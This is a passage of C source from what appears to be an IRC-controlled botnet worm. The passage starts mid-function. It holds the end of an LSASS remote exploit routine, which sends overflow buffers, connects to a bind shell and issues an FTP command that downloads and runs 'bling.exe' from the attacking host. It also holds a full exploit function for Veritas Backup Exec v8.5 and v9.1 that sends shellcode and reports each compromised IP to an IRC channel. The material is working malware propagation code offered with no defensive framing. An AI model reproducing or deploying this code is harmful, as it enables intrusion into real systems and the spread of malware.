fclosesocket(sSocket); return FALSE; } len = frecv(sSocket, recvbuf, 1600, 0); if (fsend(sSocket, reqx5, sizeof(reqx5)-1, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } len = frecv(sSocket, recvbuf, 1600, 0); if (fsend(sSocket, reqx6, sizeof(reqx6)-1, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } len = frecv(sSocket, recvbuf, 1600, 0); if ((targetx == 1) || (targetx == 2)) { memcpy(screq2k, reqx8, sizeof(reqx8)-1); memcpy(screq2k+sizeof(reqx8)-1, sendbuf, (LEN+1)*2); memcpy(screq2k2, reqx9, sizeof(reqx9)-1); memcpy(screq2k2+sizeof(reqx9)-1, sendbuf+4348-sizeof(reqx8)+1, (LEN+1)*2-4348); memcpy(screq2k2+sizeof(reqx9)-1+(LEN+1)*2-4348-sizeof(reqx8)+1+206, shitx3, sizeof(shitx3)-1); if (fsend(sSocket, screq2k, 4348, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } len = frecv(sSocket, recvbuf, 1600, 0); if (fsend(sSocket, screq2k2, 4060, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } } else { memcpy(screq, reqx7, sizeof(reqx7)-1); memcpy(screq+sizeof(reqx7)-1, &strBuffer[0], BUFSIZE); memcpy(screq+sizeof(reqx7)-1+BUFSIZE, shitx1, 9*16); screq[BUFSIZE+sizeof(reqx7)-1+1500-304-1] = 0; if (fsend(sSocket, screq, BUFSIZE+sizeof(reqx7)-1+1500-304, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } } len = frecv(sSocket, recvbuf, 1600, 0); if ((bSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } memset(&bsin, 0, sizeof(bsin)); bsin.sin_family = AF_INET; bsin.sin_port = fhtons(LSASS_BSPORT); bsin.sin_addr.s_addr = finet_addr(exinfo.ip); if (fconnect(bSocket, (LPSOCKADDR)&bsin, sizeof(bsin)) == -1) { fclosesocket(sSocket); fclosesocket(bSocket); return FALSE; } if (frecv(bSocket, recvbuf, 1600, 0) > 0) { Sleep(500); _snprintf(cmd_buff, sizeof(cmd_buff), // "tftp -i %s get %s&%s&exit\n", GetIP(exinfo.sock), filename, filename); "echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n", GetIP(exinfo.sock),FTP_PORT); if (fsend(bSocket, cmd_buff, strlen(cmd_buff), 0) == SOCKET_ERROR) { fclosesocket(sSocket); fclosesocket(bSocket); return FALSE; } fclosesocket(sSocket); fclosesocket(bSocket); _snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip); if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); addlog(buffer); exploit[exinfo.exploit].stats++; return TRUE; } else return FALSE; }
BOOL VertiasBackupExec( EXINFO exinfo, VertiasBackupExec_Version eVersion ) { char *pszVerString; // --- int nShellSize; char szShellBuf[ 512 ]; // --- SOCKET nFDSocket; sockaddr_in ServerAddr; // --- int nCounter; // prepare version depending data if( eVersion == Backup_Exec_v9_1_4691_SP1_SP0 ) { memcpy( &talk[ 37 ], &v91sp0sp1, 4 ); memcpy( &talk[ 72 ], &esisp0sp1, 4 ); pszVerString = "v9.1.4691.0+1"; } else if( eVersion == Backup_Exec_v8_5_3572 ) { memcpy( &talk[ 37 ], &v85, 4 ); memcpy( &talk[ 72 ], &esiold, 4 ); pszVerString = "v8.5.3572"; } else return FALSE; // get shellcode nShellSize = GetRNS0TerminatedShellcode( szShellBuf, sizeof( szShellBuf ), GetIP( exinfo.sock ), filename ); if( !nShellSize ) return FALSE; // create socket nFDSocket = fsocket( AF_INET, SOCK_STREAM, IPPROTO_IP ); if( nFDSocket == INVALID_SOCKET ) return FALSE; // connect to it memset( &ServerAddr, 0, sizeof( ServerAddr ) ); ServerAddr.sin_family = AF_INET; ServerAddr.sin_port = fhtons( exinfo.port ); ServerAddr.sin_addr.s_addr = finet_addr( exinfo.ip ); if( fconnect( nFDSocket, (sockaddr*)&ServerAddr, sizeof( ServerAddr ) ) == SOCKET_ERROR ) { fclosesocket( nFDSocket ); return FALSE; } // send talk if( fsend( nFDSocket, talk, sizeof( talk ) - 1, 0 ) == SOCKET_ERROR ) { fclosesocket( nFDSocket ); return FALSE; } Sleep( 10 ); // send payload(s) for( nCounter = 0; nCounter < 7; nCounter++ ) { if( fsend( nFDSocket, szShellBuf, strlen( szShellBuf ), 0 ) == SOCKET_ERROR ) { fclosesocket( nFDSocket ); return FALSE; } Sleep( 10 ); } Sleep( 1000 ); fclosesocket( nFDSocket ); // MESSAGE(S) char buffer[ IRCLINE ]; _snprintf(buffer, sizeof(buffer), "[%s (%s)]: Exploiting IP: %s.", exploit[exinfo.exploit].name, pszVerString, exinfo.ip); if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); addlog(buffer); exploit[exinfo.exploit].stats++; return TRUE; }